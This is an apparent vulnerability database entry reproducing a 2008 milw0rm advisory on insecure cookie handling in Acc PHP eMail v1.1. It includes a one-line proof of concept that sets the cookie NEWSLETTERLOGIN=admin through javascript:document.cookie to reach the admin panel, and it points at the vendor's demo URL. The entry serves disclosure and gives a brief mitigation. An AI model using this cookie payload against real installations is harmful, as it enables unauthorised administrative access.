Acc PHP eMail v1.1 Insecure Cookie Handling

vendor:

Acc PHP eMail

by:

Hakxer

7.5

CVSS

HIGH

Insecure Cookie Handling

200

CWE

Product Name: Acc PHP eMail

Affected Version From: v1.1

Affected Version To: v1.1

Patch Exists: NO

Related CWE: N/A

CPE: a:accscripts:acc_php_email

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Acc PHP eMail v1.1 Insecure Cookie Handling

Acc PHP eMail v1.1 is vulnerable to insecure cookie handling. An attacker can inject arbitrary cookies into the application and gain access to the admin panel. The attacker can inject the cookie NEWSLETTERLOGIN=admin and gain access to the admin panel.

Mitigation:

The application should validate the cookie values before using them.

Source

Exploit-DB raw data:

###########################################################################
      ______    __  __   ______          __                ______                   
     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___ 
    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/ 
        /____/                                           

# [~] Discovered by : Hakxer
# [~] Type Gap :Acc PHP eMail v1.1 Insecure Cookie Handling
# [~] Script : http://www.accscripts.com/mailinglist/
# [~] Greetz : Allah .. " Allah AkBar .. " Big Hacking SoOoN
##########################################################################

   
   PoC : javascript:document.cookie="NEWSLETTERLOGIN=admin";
         javascript:document.cookie="NEWSLETTERLOGIN=Hakxer";
   
   [~] Admin panel 
   http://www.accscripts.com/mailinglist/demo/index.php
   [~] Execute JS Code javascript:document.cookie="NEWSLETTERLOGIN=admin";
   [~] Refresh
		

#  Proud To be a Muslim #
#_=END=_#

# milw0rm.com [2008-11-03]